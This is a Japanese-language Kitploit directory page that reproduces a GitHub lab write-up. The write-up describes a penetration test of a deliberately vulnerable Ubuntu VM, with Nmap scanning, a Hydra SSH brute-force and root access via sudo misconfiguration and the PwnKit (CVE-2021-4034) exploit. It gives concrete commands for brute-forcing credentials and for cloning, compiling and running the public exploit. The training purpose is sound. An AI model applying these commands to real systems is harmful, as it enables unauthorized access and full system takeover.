Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ubuntu-privesc-lab — 完全なペネトレーションテストのワークフロー: 認証情報のブルートフォース、SSHアクセス、特権昇格 (CVE-2021-4034) | Kitploit
ツール/GitHubGitHub/vaibhavkrishna12004/ubuntu-privesc-lab
特権昇格偵察ネットワークマッピングパスワード攻撃ポートスキャン脆弱性分析エクスプロイトペネトレーションテスト設定ミス

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
学習と教育
ラボと実践
GitHubvaibhavkrishna12004/ubuntu-privesc-lab

ubuntu-privesc-lab

完全なペネトレーションテストのワークフロー: 認証情報のブルートフォース、SSHアクセス、特権昇格 (CVE-2021-4034)

リポジトリを見る
4ヶ月前未レビュー

ubuntu-privesc-lab

完全なペネトレーションテストのワークフロー: 認証情報のブルートフォース、SSHアクセス、権限昇格 (CVE-2021-4034)

概要

このプロジェクトは、脆弱なUbuntu仮想マシンに対する完全なペネトレーションテストのワークフローを示しています。攻撃チェーンには、偵察、認証情報のブルートフォース、初期アクセス、および複数の手法を用いた権限昇格が含まれます。

使用ツール

Nmap Hydra SSH Git CVE-2021-4034 (PwnKit)

偵察

偵察はNmapを使用して実施され、特定のネットワーク (wifi) 上で開放されているホストの数が明らかになりました。 nmap < ネットワークIP 0/24 > : これにより、アクティブなホストの数とそのMACアドレスが明らかになりました。 VM 1 を見つけるための偵察

観察されたように、VMはORACLE VIRTUAL BOX上で稼働しており、これが私たちの脆弱性VMであり、IPは次のとおりであると判断できました。

VM 2 の偵察

さらにスキャンしたところ、攻撃に利用可能な脆弱なオープンポートが検出されました。

主要なエクスプロイト

それを利用して、Hydraを使用した認証情報のブルートフォース攻撃を成功させました。 hydra -l < ユーザー名 > または -L < File.txt > -p < パスワード > または -P < File.txt > < ターゲットIP > < ポート >

脆弱性VMに対するHydra

このパスワードエクスプロイトの成功により、取得した認証情報をSSHポートのエクスプロイトにも使用できるようになりました。

ssh < ユーザー名@ターゲットIP > パスワード < エクスプロイト用パスワード >

取得した認証情報を使用したSSHエクスプロイト

これにより、被害者システムへの初期アクセスが得られました。さらに、sudoの誤設定によりrootへの完全なアクセスが得られました。 sudo -l : (ALL : ALL) ALL

sudo su が昇格手段でした。

二次的なエクスプロイト

私たちは「Pwnkit CVE-2021-4034」を使用して、被害者システムへのエクスプロイトを継続しました。

PwnKit (CVE-2021-4034) は、Qualysの研究チームによって2022年初頭に発見された重大なセキュリティ脆弱性であり、Linuxシステム上のPolkitフレームワークに影響を与えます。これはローカル権限昇格 (LPE) の欠陥であり、標準的な非特権ユーザーであれば誰でもシステム上で完全なroot権限 (管理者アクセス) を取得できます。この脆弱性は2009年にPolkitが導入されて以来存在しており、エクスプロイトは「自明」であると考えられているため、非常に危険です。

Common Vulnerabilities and Exposures (CVE) は、ソフトウェアおよびハードウェアにおけるサイバーセキュリティの脆弱性とエクスポージャを標準化し、公開したリストです。

CVE-2021-4034のインストールとVMのエクスプロイト

まず、pkexecの存在と権限を確認することで、ターゲットシステムが潜在的に脆弱であることを確認しました: which pkexec 出力: ls -la /usr/bin/pkexec このバイナリにはSUIDビットが設定されており、root権限で実行されることを示しているため、エクスプロイトの実行可能なターゲットとなります。

環境の準備

エクスプロイトをコンパイルするために、必要なツールをインストールしました: sudo apt update sudo apt install git build-essential -y これにより、システムに必要なコンパイラと依存関係が導入されました。 システムのaptでバックグラウンドタスクが実行されている場合は、それを終了します。

エクスプロイトコードの転送 / 取得

エクスプロイトは被害者マシン上に直接クローンされました: cd /tmp git clone https://github.com/berdav/CVE-2021-4034.git cd CVE-2021-4034 /tmpを使用することで、クラッターを回避し、現実的な攻撃者の行動を反映します。 CVE-2021-4034のインストール CVEキットのGitインストール

エクスプロイトのコンパイル

エクスプロイトは「make」を使用してコンパイルされました。

これにより、脆弱性をトリガーするために必要な実行可能ファイルが生成されました。

エクスプロイトの実行

エクスプロイトが実行されました: ./cve-2021-4034

権限昇格の確認

実行後、rootアクセスが確認されました: whoami

出力: root

権限昇格とVMへのアクセス

このエクスプロイトは、pkexecが環境変数を適切に処理しないために機能し、攻撃者が昇格した権限で任意のコードを実行できるようになります。

結論

この演習は、一見低権限のユーザーが、PwnKit (CVE-2021-4034) のような既知の脆弱性を悪用することで、システム全体の制御へと昇格できることを示しています。認証情報の侵害による初期アクセスと、体系的な列挙およびエクスプロイトを組み合わせることで、誤設定だけに頼らずにrootアクセスを達成できました。これは、タイムリーなパッチ管理と安全な構成慣行の決定的な重要性を浮き彫りにしています。たった一つの見落とされた脆弱性でも、システム全体の侵害につながる可能性があり、継続的なセキュリティ評価と多層防御戦略の必要性を強調しています。

ツールをダウンロード